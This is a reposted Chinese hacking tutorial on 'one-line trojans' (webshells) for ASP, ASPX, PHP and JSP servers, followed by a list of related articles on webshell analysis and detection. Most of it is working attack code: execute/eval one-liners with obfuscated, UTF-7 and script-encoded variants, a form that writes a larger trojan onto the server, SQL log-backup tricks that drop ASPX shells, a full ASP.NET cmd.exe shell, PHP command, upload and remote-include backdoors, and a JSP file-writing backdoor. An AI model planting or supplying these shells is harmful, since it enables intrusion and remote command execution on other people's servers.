一句话木马的原理及利用分析(asp,aspx,php,jsp)

一句话木马的适用环境:
1.服务器的来宾账户有写入权限
2.已知数据库地址且数据库格式为asa或asp
3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可
一句话木马的工作原理:
"一句话木马"服务端(本地的html提交文件)
就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改
"一句话木马"客户端(远程服务器上被插入一句话的asp文件)
用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件
现在先假设在远程主机的TEXT.ASP(客户端)中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)
<form action=http://主机路径/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea>
<center><br>
<input type=submit value=提交>
</form>
表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)
说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.
具体的就是下面这一段:
set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp
这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.
至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。
http://www.hxhack.com/bbs
关于服务器错误:
经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
Source line: execute request("nettoo")
Description: 类型不匹配: 'execute'
这个如何解决呢?
想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!
用一句话客户端连接,加入容错语句,你可以把它插入到任何ASP文件而不会像以前一样出错。
<%On Error Resume Next execute request("value")%>
常见asp一句话木马的变体:
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

<%ExecuteGlobal request(chr(35))%>
<%ExecuteGlobal request(chr(35))%>
<%execute request("#")%>
<%execute request(chr(35))%>
<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>
<%ExecuteGlobal request(chr(35))%> 9月30日
<%eval request("#")%>
数据库里插入
┼攠数畣整爠焕敌瑳∨∣┩忾
utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

各种环境下的一句话木马:
aspx
1.相当于ASP的一句话木马:
程序代码
alter database pubs set RECOVERY FULL--
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ')
backup log pubs to disk = 'd:\test11.aspx'
//这个和asp的一样,客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。
//mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)
<form action=http://192.168.2.100/asp/mu.aspx method=post>
<b>在下面输入大马内容:</b><br>
<textarea name=l cols=120 rows=35 width=45>
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script><html><head>
<title>ASP.NET Shell for WebAdmin2.X Final</title>
<meta http-equiv="Content-Type" c /></head><body>
<form runat="server">
<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">;Program</asp:Label>
<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br />
<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox><br />
<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button><p>
<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label> </p></form></body></html>
</textarea>
<center><br>
<input type=submit value=提交>
2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:
程序代码
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>')

backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'

PHP
本文没有什么特别之处,仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。
刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。
PHP语法的强大是ASP望尘莫及的,仅一个:<? phpinfo();?>就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。
这里简单探讨一下几个函数可以作为木马的使用:
1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。
例:只要将<?system($cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。
2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:
<?php include($include);?>
将其保存为1.php ,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:http://target.com/1.php? Include=http://www.xxx.com/phpspy.php
这里http://www.918x.com是不支持php的,否则将会在http://www.xxx.com这台服务器运行phpspy.php,而不是目标服务器。
3. 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马,我没有改:
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
将其保存为up.php后,在本地提交表单:
<form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大个的php木马上传上去。
4. 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:
语法: void eval(string code_str);
内容说明:本函数可将字符串之中的变量值代入,通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值的 注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。
我们可以在目标主机上保存:<?eval($cmd);?>为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic_quotes_gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。
对于这个PHP木马本地表单我做了很多次,还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。
Ps:写完后,有人告诉我,其实高手早就有微型的PHP木马了,只是没有公开。哎,我好郁闷啊,研究的都是人家早就有了的成果。不管怎么样,和大家分享一下我的研究,希望能得到帮助和指教。

JSP
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然后:http://localhost/1.txt 就出来了 内容为 hello .....
总结完毕---转

(0)

相关推荐

  • php 木马的分析(加密破解)

    分析可以知道,此木马经过了base64进行了编码,然后进行压缩.虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件.解码解压缩代码如下: 复制代码 代码如下: <?php function writetofile($filename, $data) { //File Writing $filenum=@fopen($filename,"w"); if (!$filenum) { return false;

  • 精确查找PHP WEBSHELL木马 修正版

    先来看下反引号可以成功执行命名的代码片段.代码如下: 复制代码 代码如下: `ls -al`; `ls -al`; echo "sss"; `ls -al`; $sql = "SELECT `username` FROM `table` WHERE 1"; $sql = 'SELECT `username` FROM `table` WHERE 1' /* 无非是 前面有空白字符,或者在一行代码的结束之后,后面接着写,下面两行为意外情况,也就是SQL命令里的反引号,

  • php网站被挂木马后的修复方法总结

    本文实例总结了php网站被挂木马后的修复方法.分享给大家供大家参考.具体方法如下: 在linux中我们可以使用命令来搜查木马文件,到代码安装目录执行下面命令 复制代码 代码如下: find ./ -iname "*.php" | xargs grep -H -n "eval(base64_decode" 搜出来接近100条结果,这个结果列表很重要,木马都在里面,要一个一个文件打开验证是否是木马,如果是,马上删除掉 最后找到10个木马文件,存放在各种目录,都是php

  • 精确查找PHP WEBSHELL木马的方法(1)

    先来看下反引号可以成功执行命名的代码片段.代码如下: 复制代码 代码如下: `ls -al`; `ls -al`; echo "sss"; `ls -al`; $sql = "SELECT `username` FROM `table` WHERE 1"; $sql = 'SELECT `username` FROM `table` WHERE 1' /* 无非是 前面有空白字符,或者在一行代码的结束之后,后面接着写,下面两行为意外情况,也就是SQL命令里的反引号,

  • php检测图片木马多进制编程实践

    前不久,我申请加入了某开源组织,他们要我写一个功能用来检测图片中是否有木马脚本. 其实一开始我什么也不知道,只是后来在网上查了一些资料,找到的全是有制作图片木马的教程,并没有找到检测的程序. 经过几番思索之后,决定从制作原理来分析这种木马程序.这种木马程序是十六进制编码写的,我灵机一动,写了以下这个上传类.最终通过了组织测验.呵呵 现在把它拿出来给大家分享,有什么不好的地方,还请指正! anyon@139.com; 复制代码 代码如下: <?php /** +------------------

  • PHP Web木马扫描器代码分享

    不废话了,直接贴代码了. 代码如下: <?php header('content-type:text/html;charset=gbk'); set_time_limit(0);//防止超时 /** * * php目录扫描监控增强版 * * @version 1.0 * 下面几个变量使用前需要手动设置 * **/ /*===================== 程序配置 =====================*/ $pass="test";//设置密码 $jkdir=&quo

  • php木马webshell扫描器代码

    复制代码 代码如下: <?php /* +--------------------------------------------------------------------------+ | Codz by indexphp Version:0.01 | | (c) 2009 indexphp | | http://www.indexphp.org | +--------------------------------------------------------------------

  • PHP Web木马扫描器代码 v1.0 安全测试工具

    scanner.php 复制代码 代码如下: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net , 转载请注明t00ls */ /* [+] 版本: v1.0 */ /* [+] 功能: web版php木马扫描工具 */

  • PHP 木马攻击的防御设置方法

    1.防止跳出web目录 首先修改httpd.conf,假如您只允许您的php脚本程式在web目录里操作,还能够修改httpd.conf文档限制php的操作路径.比如您的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache /htdocs 这样,假如脚本要读取/usr/local/apache/htdocs以外的文档将不会被允许,假如错误显示打开的话会提

  • PHP实现webshell扫描文件木马的方法

    本文实例讲述了PHP实现webshell扫描文件木马的方法.分享给大家供大家参考,具体如下: 可扫描 weevelyshell 生成 或加密的shell 及各种变异webshell 目前仅支持php 支持扫描 weevelyshell 生成 或加密的shell 支持扫描callback一句话shell 支持各种php大马 <!DOCTYPE html> <html> <head> <meta charset='gb2312'> <title>PH

随机推荐